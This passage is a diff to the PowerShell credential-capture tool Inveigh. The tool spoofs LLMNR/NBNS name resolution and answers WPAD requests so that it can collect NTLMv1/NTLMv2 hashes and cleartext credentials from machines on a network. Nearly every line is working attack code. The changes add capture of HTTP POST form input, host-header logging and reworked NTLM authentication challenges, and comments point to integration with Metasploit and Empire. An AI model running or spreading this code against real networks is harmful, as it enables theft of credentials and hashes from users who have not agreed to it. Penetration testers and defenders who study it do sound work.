+ Write-Output($unique_cleartext + $inveigh.newline)
}
- "* local administrator *"
+ $unique_cleartext_last = $unique_cleartext
+ }
+
+ Start-Sleep -m 5
+ }
+ else
+ {
+ Write-Output("$(Get-Date -format 's') - No cleartext credentials have been captured" + $inveigh.newline)
+ }
+
+ if($inveigh.NTLMv1_list.Count -gt 0)
+ {
+ Write-Output("$(Get-Date -format 's') - Current unique NTLMv1 challenge/response captures:" + $inveigh.newline)
+ $inveigh.NTLMv1_list.Sort()
+
+ foreach($unique_NTLMv1 in $inveigh.NTLMv1_list)
+ {
+ $unique_NTLMv1_account = $unique_NTLMv1.SubString(0,$unique_NTLMv1.IndexOf(":",($unique_NTLMv1.IndexOf(":") + 2)))
+
+ if($unique_NTLMv1_account -ne $unique_NTLMv1_account_last)
{
- Write-Warning $inveigh.console_queue[0]
- $inveigh.console_queue.RemoveAt(0)
+ Write-Output($unique_NTLMv1 + $inveigh.newline)
}
- default
+ $unique_NTLMv1_account_last = $unique_NTLMv1_account
+ }
+
+ $unique_NTLMv1_account_last = ''
+ Start-Sleep -m 5
+ Write-Output("$(Get-Date -format 's') - Current NTLMv1 IP addresses and usernames:" + $inveigh.newline)
+
+ foreach($NTLMv1_username in $inveigh.NTLMv1_username_list)
+ {
+ Write-Output($NTLMv1_username + $inveigh.newline)
+ }
+
+ Start-Sleep -m 5
+ }
+ else
+ {
+ Write-Output("$(Get-Date -format 's') - No NTLMv1 challenge/response hashes have been captured" + $inveigh.newline)
+ }
+
+ if($inveigh.NTLMv2_list.Count -gt 0)
+ {
+ Write-Output("$(Get-Date -format 's') - Current unique NTLMv2 challenge/response captures:" + $inveigh.newline)
+ $inveigh.NTLMv2_list.Sort()
+
+ foreach($unique_NTLMv2 in $inveigh.NTLMv2_list)
+ {
+ $unique_NTLMv2_account = $unique_NTLMv2.SubString(0,$unique_NTLMv2.IndexOf(":",($unique_NTLMv2.IndexOf(":") + 2)))
+
+ if($unique_NTLMv2_account -ne $unique_NTLMv2_account_last)
{
- Write-Output $inveigh.console_queue[0]
- $inveigh.console_queue.RemoveAt(0)
+ Write-Output($unique_NTLMv2 + $inveigh.newline)
}
+ $unique_NTLMv2_account_last = $unique_NTLMv2_account
}
+ $unique_NTLMv2_account_last = ''
+ Start-Sleep -m 5
+ Write-Output("$(Get-Date -format 's') - Current NTLMv2 IP addresses and usernames:" + $inveigh.newline)
+
+ foreach($NTLMv2_username in $inveigh.NTLMv2_username_list)
+ {
+ Write-Output($NTLMv2_username + $inveigh.newline)
+ }
+
}
+ else
+ {
+ Write-Output("$(Get-Date -format 's') - No NTLMv2 challenge/response hashes have been captured" + $inveigh.newline)
+ }
+
+ $console_status_stopwatch = [System.Diagnostics.Stopwatch]::StartNew()
}
@@ -3472,49 +3616,30 @@ if($inveigh)
if($inveigh.running -or $inveigh.relay_running)
{
- if($inveigh.HTTP_listener.IsListening)
- {
- $inveigh.HTTP_listener.Stop()
- $inveigh.HTTP_listener.Close()
- }
-
- if($inveigh.HTTPS)
+ if($inveigh.HTTPS -and !$inveigh.HTTPS_existing_certificate -or ($inveigh.HTTPS_existing_certificate -and $inveigh.HTTPS_force_certificate_delete))
{
- $certificate_check = & "netsh" http show sslcert
-
- if($certificate_check)
- {
- $netsh_ipport = "ipport=" + $inveigh.HTTPS_IP + ":" + $inveigh.HTTPS_port
- $netsh_arguments = @("http","delete","sslcert",$netsh_ipport)
- & "netsh" $netsh_arguments > $null
- }
- if(!$inveigh.HTTPS_existing_certificate -or ($inveigh.HTTPS_existing_certificate -and $inveigh.HTTPS_force_certificate_delete))
+ try
{
+ $certificate_store = New-Object System.Security.Cryptography.X509Certificates.X509Store("My","LocalMachine")
+ $certificate_store.Open('ReadWrite')
+ $certificates = (Get-ChildItem Cert:\LocalMachine\My | Where-Object {$_.Issuer -Like "CN=" + $inveigh.certificate_issuer})
- try
+ ForEach($certificate in $certificates)
{
- $certificate_store = New-Object System.Security.Cryptography.X509Certificates.X509Store("My","LocalMachine")
- $certificate_store.Open('ReadWrite')
- $certificates = (Get-ChildItem Cert:\LocalMachine\My | Where-Object {$_.Issuer -Like "CN=" + $inveigh.certificate_issuer})
-
- ForEach($certificate in $certificates)
- {
- $certificate_store.Remove($certificate)
- }
-
- $certificate_store.Close()
+ $certificate_store.Remove($certificate)
}
- catch
- {
- Write-Output("SSL Certificate Deletion Error - Remove Manually")
- $inveigh.log.Add("$(Get-Date -format 's') - SSL Certificate Deletion Error - Remove Manually") > $null
- if($inveigh.file_output)
- {
- "$(Get-Date -format 's') - SSL Certificate Deletion Error - Remove Manually" | Out-File $Inveigh.log_out_file -Append
- }
+ $certificate_store.Close()
+ }
+ catch
+ {
+ Write-Output("SSL Certificate Deletion Error - Remove Manually")
+ $inveigh.log.Add("$(Get-Date -format 's') - SSL Certificate Deletion Error - Remove Manually") > $null
+ if($inveigh.file_output)
+ {
+ "$(Get-Date -format 's') - SSL Certificate Deletion Error - Remove Manually" | Out-File $Inveigh.log_out_file -Append
}
}
@@ -3550,7 +3675,6 @@ if($inveigh)
$inveigh.HTTP = $false
$inveigh.HTTPS = $false
Start-Sleep -S 5
-
}
else
{
@@ -3568,11 +3692,20 @@ function Get-Inveigh
Get-Inveigh will get stored Inveigh data from memory.
.PARAMETER Console
-Get queued console output. This is also the default if no parameters are set.
+Get queued console output. This is also the default if no parameters are set.
+
+.PARAMETER Learning
+Get valid hosts discovered through spoofer learning.
.PARAMETER Log
Get log entries.
+.PARAMETER Cleartext
+Get captured cleartext credentials.
+
+.PARAMETER CleartextUnique
+Get unique captured cleartext credentials.
+
.PARAMETER NTLMv1
Get captured NTLMv1 challenge/response hashes.
@@ -3591,20 +3724,20 @@ Get the first captured NTLMv2 challenge/response for each unique account.
.PARAMETER NTLMv2Usernames
Get IP addresses and usernames for captured NTLMv2 challenge/response hashes.
-.PARAMETER Cleartext
-Get captured cleartext credentials.
-
-.PARAMETER CleartextUnique
-Get unique captured cleartext credentials.
+.PARAMETER POSTRequest
+Get captured POST requests.
-.PARAMETER Learning
-Get valid hosts discovered through spoofer learning.
+.PARAMETER POSTRequestUnique
+Get unique captured POST request.
#>
[CmdletBinding()]
param
(
+ [parameter(Mandatory=$false)][Switch]$Cleartext,
+ [parameter(Mandatory=$false)][Switch]$CleartextUnique,
[parameter(Mandatory=$false)][Switch]$Console,
+ [parameter(Mandatory=$false)][Switch]$Learning,
[parameter(Mandatory=$false)][Switch]$Log,
[parameter(Mandatory=$false)][Switch]$NTLMv1,
[parameter(Mandatory=$false)][Switch]$NTLMv2,
@@ -3612,9 +3745,8 @@ param
[parameter(Mandatory=$false)][Switch]$NTLMv2Unique,
[parameter(Mandatory=$false)][Switch]$NTLMv1Usernames,
[parameter(Mandatory=$false)][Switch]$NTLMv2Usernames,
- [parameter(Mandatory=$false)][Switch]$Cleartext,
- [parameter(Mandatory=$false)][Switch]$CleartextUnique,
- [parameter(Mandatory=$false)][Switch]$Learning,
+ [parameter(Mandatory=$false)][Switch]$POSTRequest,
+ [parameter(Mandatory=$false)][Switch]$POSTRequestUnique,
[parameter(ValueFromRemainingArguments=$true)]$invalid_parameter
)
@@ -3635,30 +3767,7 @@ if($Console -or $PSBoundParameters.Count -eq 0)
switch -wildcard ($inveigh.console_queue[0])
{
- "* written to *"
- {
-
- if($inveigh.file_output)
- {
- Write-Warning $inveigh.console_queue[0]
- }
-
- $inveigh.console_queue.RemoveAt(0)
- }
-
- "* for relay *"
- {
- Write-Warning $inveigh.console_queue[0]
- $inveigh.console_queue.RemoveAt(0)
- }
-
- "*SMB relay *"
- {
- Write-Warning $inveigh.console_queue[0]
- $inveigh.console_queue.RemoveAt(0)
- }
-
- "* local administrator *"
+ {$_ -like "* written to *" -or $_ -like "* for relay *" -or $_ -like "*SMB relay *" -or $_ -like "* local administrator *"}
{
Write-Warning $inveigh.console_queue[0]
$inveigh.console_queue.RemoveAt(0)
@@ -3749,6 +3858,16 @@ if($CleartextUnique)
Write-Output $inveigh.cleartext_list | Get-Unique
}
+if($POSTRequest)
+{
+ Write-Output $inveigh.POST_request_list
+}
+
+if($POSTRequestUnique)
+{
+ Write-Output $inveigh.POST_request_list | Get-Unique
+}
+
if($Learning)
{
Write-Output $inveigh.valid_host_list
@@ -3761,8 +3880,18 @@ function Watch-Inveigh
<#
.SYNOPSIS
Watch-Inveigh will enabled real time console output. If using this function through a shell, test to ensure that it doesn't hang the shell.
+
+.PARAMETER ConsoleOutput
+(Medium,Low) Medium and Low can be used to reduce output.
#>
+[CmdletBinding()]
+param
+(
+ [parameter(Mandatory=$false)][ValidateSet("Low","Medium")][String]$ConsoleOutput = "Y",
+ [parameter(ValueFromRemainingArguments=$true)]$invalid_parameter
+)
+
if($inveigh.tool -ne 1)
{
@@ -3774,60 +3903,51 @@ if($inveigh.tool -ne 1)
:console_loop while((($inveigh.running -or $inveigh.relay_running) -and $inveigh.console_output) -or ($inveigh.console_queue.Count -gt 0 -and $inveigh.console_output))
{
- while($inveigh.console_queue.Count -gt 0)
+ while($inveigh.console_queue.Count -gt 0)
+ {
+
+ switch -wildcard ($inveigh.console_queue[0])
{
- if($inveigh.output_stream_only)
+ {$_ -like "* written to *" -or $_ -like "* for relay *" -or $_ -like "*SMB relay *" -or $_ -like "* local administrator *"}
{
- Write-Output($inveigh.console_queue[0] + $inveigh.newline)
+ Write-Warning $inveigh.console_queue[0]
$inveigh.console_queue.RemoveAt(0)
}
- else
+
+ {$_ -like "* spoofer is disabled" -or $_ -like "* local request" -or $_ -like "* host header *" -or $_ -like "* user agent *"}
{
- switch -wildcard ($inveigh.console_queue[0])
+ if($ConsoleOutput -eq 'Y')
{
-
- "* written to *"
- {
+ Write-Output $inveigh.console_queue[0]
+ }
- if($inveigh.file_output)
- {
- Write-Warning $inveigh.console_queue[0]
- }
+ $inveigh.console_queue.RemoveAt(0)
- $inveigh.console_queue.RemoveAt(0)
- }
+ }
- "* for relay *"
- {
- Write-Warning $inveigh.console_queue[0]
- $inveigh.console_queue.RemoveAt(0)
- }
+ {$_ -like "* response sent" -or $_ -like "* ignoring *" -or $_ -like "* HTTP*request for *" -or $_ -like "* Proxy request for *"}
+ {
+
+ if($ConsoleOutput -ne "Low")
+ {
+ Write-Output $inveigh.console_queue[0]
+ }
- "*SMB relay *"
- {
- Write-Warning $inveigh.console_queue[0]
- $inveigh.console_queue.RemoveAt(0)
- }
+ $inveigh.console_queue.RemoveAt(0)
- "* local administrator *"
- {
- Write-Warning $inveigh.console_queue[0]
- $inveigh.console_queue.RemoveAt(0)
- }
+ }
- default
- {
- Write-Output $inveigh.console_queue[0]
- $inveigh.console_queue.RemoveAt(0)
- }
+ default
+ {
+ Write-Output $inveigh.console_queue[0]
+ $inveigh.console_queue.RemoveAt(0)
+ }
- }
+ }
- }
-
- }
+ }
if([Console]::KeyAvailable)
{
diff --git a/Scripts/Inveigh.ps1 b/Scripts/Inveigh.ps1
index ce7020a..0442f54 100644
--- a/Scripts/Inveigh.ps1
+++ b/Scripts/Inveigh.ps1
@@ -21,7 +21,7 @@ Default = Auto: (Auto,Y,N) Set the privilege mode. Auto will determine if Inveig
elevated privilege. If so, options that require elevated privilege can be used.
.PARAMETER IP
-Specific local IP address for listening. This IP address will also be used for LLMNR/NBNS spoofing if the
+Local IP address for listening and packet sniffing. This IP address will also be used for LLMNR/NBNS spoofing if the
SpooferIP parameter is not set.
.PARAMETER SpooferIP
@@ -141,11 +141,6 @@ Default = Disabled: (Y/N) Force deletion of an existing certificate that matches
Default = NTLM: (Anonymous,Basic,NTLM,NTLMNoESS) HTTP/HTTPS server authentication type for wpad.dat requests. Setting to
Anonymous can prevent browser login prompts. NTLMNoESS turns off the 'Extended Session Security' flag during negotiation.
-.PARAMETER WPADEmptyFile
-Default = Enabled: (Y/N) Enable/Disable serving a proxyless, all direct, wpad.dat file for wpad.dat requests.
-Enabling this setting can reduce the amount of redundant wpad.dat requests. This parameter is ignored when
-using WPADIP, WPADPort, or WPADResponse.
-
.PARAMETER WPADIP
Proxy server IP to be included in a basic wpad.dat response for WPAD enabled browsers. This parameter must be used
with WPADPort.
@@ -154,6 +149,11 @@ with WPADPort.
Proxy server port to be included in a basic wpad.dat response for WPAD enabled browsers. This parameter must be
used with WPADIP.
+.PARAMETER WPADDirectFile
+Default = Enabled: (Y/N) Enable/Disable serving a proxyless, all direct, wpad.dat file for wpad.dat requests.
+Enabling this setting can reduce the amount of redundant wpad.dat requests. This parameter is ignored when
+using WPADIP, WPADPort, or WPADResponse.
+
.PARAMETER WPADDirectHosts
Comma separated list of hosts to list as direct in the wpad.dat file. Listed hosts will not be routed through the
defined proxy.
@@ -196,7 +196,7 @@ Default = Disabled: (Y/N) Enable/Disable showing NTLM challenge/response capture
.PARAMETER ConsoleOutput
Default = Disabled: (Y/N) Enable/Disable real time console output. If using this option through a shell, test to
-ensure that it doesn't hang the shell.
+ensure that it doesn't hang the shell. Medium and Low can be used to reduce output.
.PARAMETER ConsoleStatus
(Integer) Interval in minutes for displaying all unique captured hashes and credentials. This is useful for
@@ -275,7 +275,7 @@ Invoke-Inveigh -HTTPResponse "<html><head><meta http-equiv='refresh' content='0;
Execute specifying an HTTP redirect response.
.NOTES
-1. An elevated administrator or SYSTEM shell is needed.
+1. An elevated administrator or SYSTEM shell is needed for some features.
2. Currently supports IPv4 LLMNR/NBNS spoofing and HTTP/HTTPS/SMB NTLMv1/NTLMv2 challenge/response capture.
3. LLMNR/NBNS spoofing is performed through sniffing and sending with raw sockets.
4. SMB challenge/response captures are performed by sniffing over the host system's SMB service.
@@ -304,7 +304,7 @@ param
[parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$NBNSBruteForce = "N",
[parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$SpooferLearning = "N",
[parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$SpooferRepeat = "Y",
- [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$ConsoleOutput = "N",
+ [parameter(Mandatory=$false)][ValidateSet("Y","N","Low","Medium")][String]$ConsoleOutput = "N",
[parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$ConsoleUnique = "Y",
[parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$FileOutput = "N",
[parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$FileUnique = "Y",
@@ -312,7 +312,7 @@ param
[parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$OutputStreamOnly = "N",
[parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$MachineAccounts = "N",
[parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$ShowHelp = "Y",
- [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$WPADEmptyFile = "Y",
+ [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$WPADDirectFile = "Y",
[parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$StartupChecks = "Y",
[parameter(Mandatory=$false)][ValidateSet("0","1","2")][String]$Tool = "0",
[parameter(Mandatory=$false)][ValidateSet("Auto","Y","N")][String]$ElevatedPrivilege = "Auto",
@@ -335,9 +335,9 @@ param
[parameter(Mandatory=$false)][Array]$SpooferIPsReply = "",
[parameter(Mandatory=$false)][Array]$SpooferIPsIgnore = "",
[parameter(Mandatory=$false)][Array]$WPADDirectHosts = "",
+ [parameter(Mandatory=$false)][Int]$ConsoleStatus = "",
[parameter(Mandatory=$false)][Int]$HTTPPort = "80",
[parameter(Mandatory=$false)][Int]$HTTPSPort = "443",
- [parameter(Mandatory=$false)][Int]$ConsoleStatus = "",
[parameter(Mandatory=$false)][Int]$LLMNRTTL = "30",
[parameter(Mandatory=$false)][Int]$NBNSTTL = "165",
[parameter(Mandatory=$false)][Int]$NBNSBruteForcePause = "",
@@ -348,7 +348,7 @@ param
[parameter(Mandatory=$false)][Int]$SpooferLearningDelay = "",
[parameter(Mandatory=$false)][Int]$SpooferLearningInterval = "30",
[parameter(Mandatory=$false)][String]$HTTPBasicRealm = "IIS",
- [parameter(Mandatory=$false)][String]$HTTPContentType = "",
+ [parameter(Mandatory=$false)][String]$HTTPContentType = "text/html",
[parameter(Mandatory=$false)][String]$HTTPDefaultFile = "",
[parameter(Mandatory=$false)][String]$HTTPDefaultEXE = "",
[parameter(Mandatory=$false)][String]$HTTPResponse = "",
@@ -428,6 +428,7 @@ if(!$inveigh)
$inveigh.NTLMv2_list = New-Object System.Collections.ArrayList
$inveigh.NTLMv2_username_list = New-Object System.Collections.ArrayList
$inveigh.cleartext_list = New-Object System.Collections.ArrayList
+ $inveigh.POST_request_list = New-Object System.Collections.ArrayList
$inveigh.IP_capture_list = New-Object System.Collections.ArrayList
$inveigh.SMBRelay_failed_list = New-Object System.Collections.ArrayList
$inveigh.valid_host_list = New-Object System.Collections.ArrayList
@@ -455,6 +456,7 @@ if(!$inveigh.relay_running)
$inveigh.NTLMv1_file_queue = New-Object System.Collections.ArrayList
$inveigh.NTLMv2_file_queue = New-Object System.Collections.ArrayList
$inveigh.cleartext_file_queue = New-Object System.Collections.ArrayList
+ $inveigh.POST_request_file_queue = New-Object System.Collections.ArrayList
$inveigh.HTTP_challenge_queue = New-Object System.Collections.ArrayList
$inveigh.console_output = $false
$inveigh.console_input = $true
@@ -465,6 +467,7 @@ if(!$inveigh.relay_running)
$inveigh.NTLMv1_out_file = $output_directory + "\Inveigh-NTLMv1.txt"
$inveigh.NTLMv2_out_file = $output_directory + "\Inveigh-NTLMv2.txt"
$inveigh.cleartext_out_file = $output_directory + "\Inveigh-Cleartext.txt"
+ $inveigh.POST_request_out_file = $output_directory + "\Inveigh-FormInput.txt"
}
if($ElevatedPrivilege -eq 'Auto')
@@ -558,6 +561,7 @@ if($Inspect)
$NBNS = "N"
$HTTP = "N"
$HTTPS = "N"
+ $Proxy = "N"
$SMB = "N"
}
@@ -567,6 +571,7 @@ if($Tool -eq 1) # Metasploit Interactive PowerShell Payloads and Meterpreter's P
$inveigh.output_stream_only = $true
$inveigh.newline = ""
$ConsoleOutput = "N"
+
}
elseif($Tool -eq 2) # PowerShell Empire
{
@@ -574,8 +579,28 @@ elseif($Tool -eq 2) # PowerShell Empire
$inveigh.output_stream_only = $true
$inveigh.console_input = $false
$inveigh.newline = "`n"
- $ConsoleOutput = "Y"
$ShowHelp = "N"
+
+ switch ($ConsoleOutput)
+ {
+
+ 'Low'
+ {
+ $ConsoleOutput = "Low"
+ }
+
+ 'Medium'
+ {
+ $ConsoleOutput = "Medium"
+ }
+
+ default
+ {
+ $ConsoleOutput = "Y"
+ }
+
+ }
+
}
else
{
@@ -892,7 +917,11 @@ if($HTTP -eq 'Y' -or $HTTPS -eq 'Y')
if($HTTPResponse)
{
$inveigh.status_queue.Add("HTTP/HTTPS Response = Enabled") > $null
- $inveigh.status_queue.Add("HTTP/HTTPS Response Content Type = $HTTPContentType") > $null
+ }
+
+ if($HTTPResponse -or $HTTPDir -and $HTTPContentType -ne 'html/text')
+ {
+ $inveigh.status_queue.Add("HTTP/HTTPS/Proxy Content Type = $HTTPContentType") > $null
}
if($HTTPAuth -eq 'Basic' -or $WPADAuth -eq 'Basic')
@@ -938,10 +967,20 @@ if($HTTP -eq 'Y' -or $HTTPS -eq 'Y')
$inveigh.status_queue.Add("WPAD Direct Hosts = " + ($WPADDirectHosts -join ",")) > $null
}
- if($WPADResponse)
+ if($WPADResponse -and $Proxy -eq 'N')
{
$inveigh.status_queue.Add("WPAD Custom Response = Enabled") > $null
}
+ elseif($WPADResponse -and $Proxy -eq 'Y')
+ {
+ $inveigh.status_queue.Add("WPAD Proxy Response = Enabled") > $null
+
+ if($WPADIP -and $WPADPort)
+ {
+ $inveigh.status_queue.Add("WPAD Failover = $WPADIP`:$WPADPort") > $null
+ }
+
+ }
elseif($WPADIP -and $WPADPort)
{
$inveigh.status_queue.Add("WPAD Response = Enabled") > $null
@@ -953,7 +992,7 @@ if($HTTP -eq 'Y' -or $HTTPS -eq 'Y')
}
}
- elseif($WPADEmptyFile -eq 'Y')
+ elseif($WPADDirectFile -eq 'Y')
{
$inveigh.status_queue.Add("WPAD Default Response = Enabled") > $null
$WPADResponse = "function FindProxyForURL(url,host){return `"DIRECT`";}"
@@ -976,9 +1015,18 @@ else
$inveigh.machine_accounts = $true
}
-if($ConsoleOutput -eq 'Y')
+if($ConsoleOutput -ne 'N')
{
- $inveigh.status_queue.Add("Real Time Console Output = Enabled") > $null
+
+ if($ConsoleOutput -eq 'Y')
+ {
+ $inveigh.status_queue.Add("Real Time Console Output = Enabled") > $null
+ }
+ else
+ {
+ $inveigh.status_queue.Add("Real Time Console Output = $ConsoleOutput") > $null
+ }
+
$inveigh.console_output = $true
if($ConsoleStatus -eq 1)
@@ -1065,41 +1113,19 @@ if($inveigh.status_output)
while($inveigh.status_queue.Count -gt 0)
{
- if($inveigh.output_stream_only)
- {
- Write-Output($inveigh.status_queue[0] + $inveigh.newline)
- $inveigh.status_queue.RemoveAt(0)
- }
- else
+ switch -Wildcard ($inveigh.status_queue[0])
{
- switch -Wildcard ($inveigh.status_queue[0])
+ {$_ -like "* Disabled Due To *" -or $_ -like "Run Stop-Inveigh to stop Inveigh" -or $_ -like "Windows Firewall = Enabled"}
{
+ Write-Warning ($inveigh.status_queue[0] + $inveigh.newline)
+ $inveigh.status_queue.RemoveAt(0)
+ }
- "* Disabled Due To *"
- {
- Write-Warning($inveigh.status_queue[0])
- $inveigh.status_queue.RemoveAt(0)
- }
-
- "Run Stop-Inveigh to stop Inveigh"
- {
- Write-Warning($inveigh.status_queue[0])
- $inveigh.status_queue.RemoveAt(0)
- }
-
- "Windows Firewall = Enabled"
- {
- Write-Warning($inveigh.status_queue[0])
- $inveigh.status_queue.RemoveAt(0)
- }
-
- default
- {
- Write-Output($inveigh.status_queue[0])
- $inveigh.status_queue.RemoveAt(0)
- }
-
+ default
+ {
+ Write-Output ($inveigh.status_queue[0] + $inveigh.newline)
+ $inveigh.status_queue.RemoveAt(0)
}
}
@@ -1153,6 +1179,18 @@ $shared_basic_functions_scriptblock =
return $string_extract
}
+ function ConvertFrom-PacketOrderedDictionary
+ {
+ param($packet_ordered_dictionary)
+
+ ForEach($field in $packet_ordered_dictionary.Values)
+ {
+ $byte_array += $field
+ }
+
+ return $byte_array
+ }
+
}
# SMB NTLM Functions ScriptBlock - function for parsing NTLM challenge/response
@@ -1380,11 +1418,6 @@ $HTTP_scriptblock =
{
$HTTP_linger = New-Object System.Net.Sockets.LingerOption($true,0)
$HTTP_listener.Server.LingerState = $HTTP_linger
- $HTTP_WWW_authenticate_header = 0x50,0x72,0x6f,0x78,0x79,0x2d,0x41,0x75,0x74,0x68,0x65,0x6e,0x74,0x69,0x63,0x61,0x74,0x65,0x3a,0x20 # Proxy-Authenticate
- }
- else
- {
- $HTTP_WWW_authenticate_header = 0x57,0x57,0x57,0x2d,0x41,0x75,0x74,0x68,0x65,0x6e,0x74,0x69,0x63,0x61,0x74,0x65,0x3a,0x20 # WWW-Authenticate
}
try
@@ -1404,6 +1437,12 @@ $HTTP_scriptblock =
{
$TCP_request = ""
$TCP_request_bytes = New-Object System.Byte[] 4096
+ $HTTP_header_content_type = 0x43,0x6f,0x6e,0x74,0x65,0x6e,0x74,0x2d,0x54,0x79,0x70,0x65,0x3a,0x20 + [System.Text.Encoding]::UTF8.GetBytes("text/html")
+ $HTTP_header_cache_control = ""
+ $HTTP_header_authenticate = ""
+ $HTTP_header_authenticate_data = ""
+ $HTTP_message = ""
+ $HTTP_header_authorization = ""
while(!$HTTP_listener.Pending() -and !$HTTP_client.Connected)
{
@@ -1456,7 +1495,7 @@ $HTTP_scriptblock =
$TCP_request = [System.BitConverter]::ToString($TCP_request_bytes)
}
- if($TCP_request -like "47-45-54-20*" -or $TCP_request -like "48-45-41-44-20*" -or $TCP_request -like "4f-50-54-49-4f-4e-53-20*" -or $TCP_request -like "43-4f-4e-4e-45-43-54*")
+ if($TCP_request -like "47-45-54-20*" -or $TCP_request -like "48-45-41-44-20*" -or $TCP_request -like "4f-50-54-49-4f-4e-53-20*" -or $TCP_request -like "43-4f-4e-4e-45-43-54*" -or $TCP_request -like "50-4f-53-54*")
{
$HTTP_raw_URL = $TCP_request.Substring($TCP_request.IndexOf("-20-") + 4,$TCP_request.Substring($TCP_request.IndexOf("-20-") + 1).IndexOf("-20-") - 3)
$HTTP_raw_URL = $HTTP_raw_URL.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)}
@@ -1470,45 +1509,43 @@ $HTTP_scriptblock =
if($TCP_request -like "*-41-75-74-68-6F-72-69-7A-61-74-69-6F-6E-3A-20-*")
{
- $HTTP_authorization_header = $TCP_request.Substring($TCP_request.IndexOf("-41-75-74-68-6F-72-69-7A-61-74-69-6F-6E-3A-20-") + 46)
- $HTTP_authorization_header = $HTTP_authorization_header.Substring(0,$HTTP_authorization_header.IndexOf("-0D-0A-"))
- $HTTP_authorization_header = $HTTP_authorization_header.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)}
- $authentication_header = New-Object System.String ($HTTP_authorization_header,0,$HTTP_authorization_header.Length)
- }
- else
- {
- $authentication_header = ""
+ $HTTP_header_authorization_extract = $TCP_request.Substring($TCP_request.IndexOf("-41-75-74-68-6F-72-69-7A-61-74-69-6F-6E-3A-20-") + 46)
+ $HTTP_header_authorization_extract = $HTTP_header_authorization_extract.Substring(0,$HTTP_header_authorization_extract.IndexOf("-0D-0A-"))
+ $HTTP_header_authorization_extract = $HTTP_header_authorization_extract.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)}
+ $HTTP_header_authorization = New-Object System.String ($HTTP_header_authorization_extract,0,$HTTP_header_authorization_extract.Length)
}
- if($HTTP_request_raw_URL -match '/wpad.dat' -and $WPADAuth -eq 'Anonymous')
+ if(($HTTP_request_raw_URL -notmatch '/wpad.dat' -and $HTTPAuth -eq 'Anonymous') -or ($HTTP_request_raw_URL -match '/wpad.dat' -and $WPADAuth -eq 'Anonymous'))
{
$HTTP_response_status_code = 0x32,0x30,0x30
$HTTP_response_phrase = 0x4f,0x4b
}
else
{
-
+
+ if(($HTTP_request_raw_url -match '/wpad.dat' -and $WPADAuth -eq 'NTLM') -or ($HTTP_request_raw_url -notmatch '/wpad.dat' -and $HTTPAuth -eq 'NTLM'))
+ {
+ $HTTPNTLMESS = $true
+ }
+ else
+ {
+ $HTTPNTLMESS = $false
+ }
+
if($proxy_listener)
{
$HTTP_response_status_code = 0x34,0x30,0x37
+ $HTTP_header_authenticate = 0x50,0x72,0x6f,0x78,0x79,0x2d,0x41,0x75,0x74,0x68,0x65,0x6e,0x74,0x69,0x63,0x61,0x74,0x65,0x3a,0x20
}
else
{
$HTTP_response_status_code = 0x34,0x30,0x31
+ $HTTP_header_authenticate = 0x57,0x57,0x57,0x2d,0x41,0x75,0x74,0x68,0x65,0x6e,0x74,0x69,0x63,0x61,0x74,0x65,0x3a,0x20
}
-
+
$HTTP_response_phrase = 0x55,0x6e,0x61,0x75,0x74,0x68,0x6f,0x72,0x69,0x7a,0x65,0x64
}
- if(($HTTP_request_raw_url -match '/wpad.dat' -and $WPADAuth -eq 'NTLM') -or ($HTTP_request_raw_url -notmatch '/wpad.dat' -and $HTTPAuth -eq 'NTLM'))
- {
- $HTTPNTLMESS = $true
- }
- else
- {
- $HTTPNTLMESS = $false
- }
-
$NTLM = "NTLM"
$NTLM_auth = $false
$HTTP_source_IP = $HTTP_client.Client.RemoteEndpoint.Address.IPAddressToString
@@ -1518,16 +1555,26 @@ $HTTP_scriptblock =
$inveigh.console_queue.Add("$(Get-Date -format 's') - $HTTP_type request for $HTTP_request_raw_URL received from $HTTP_source_IP")
$inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - $HTTP_type request for $HTTP_request_raw_URL received from $HTTP_source_IP")])
+ if($TCP_request -like "*-48-6F-73-74-3A-20-*")
+ {
+ $HTTP_header_host_extract = $TCP_request.Substring($TCP_request.IndexOf("-48-6F-73-74-3A-20-") + 18)
+ $HTTP_header_host_extract = $HTTP_header_host_extract.Substring(0,$HTTP_header_host_extract.IndexOf("-0D-0A-"))
+ $HTTP_header_host_extract = $HTTP_header_host_extract.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)}
+ $HTTP_header_host = New-Object System.String ($HTTP_header_host_extract,0,$HTTP_header_host_extract.Length)
+ $inveigh.console_queue.Add("$(Get-Date -format 's') - $HTTP_type host header $HTTP_header_host received from $HTTP_source_IP")
+ $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - $HTTP_type host header $HTTP_header_host received from $HTTP_source_IP")])
+ }
+
if($TCP_request -like "*-55-73-65-72-2D-41-67-65-6E-74-3A-20-*")
{
- $HTTP_user_agent = $TCP_request.Substring($TCP_request.IndexOf("-55-73-65-72-2D-41-67-65-6E-74-3A-20-") + 36)
- $HTTP_user_agent = $HTTP_user_agent.Substring(0,$HTTP_user_agent.IndexOf("-0D-0A-"))
- $HTTP_user_agent = $HTTP_user_agent.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)}
- $user_agent = New-Object System.String ($HTTP_user_agent,0,$HTTP_user_agent.Length)
- $inveigh.console_queue.Add("$(Get-Date -format 's') - $HTTP_type user agent $user_agent from $HTTP_source_IP")
- $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - $HTTP_type user agent $user_agent from $HTTP_source_IP")])
+ $HTTP_header_user_agent_extract = $TCP_request.Substring($TCP_request.IndexOf("-55-73-65-72-2D-41-67-65-6E-74-3A-20-") + 36)
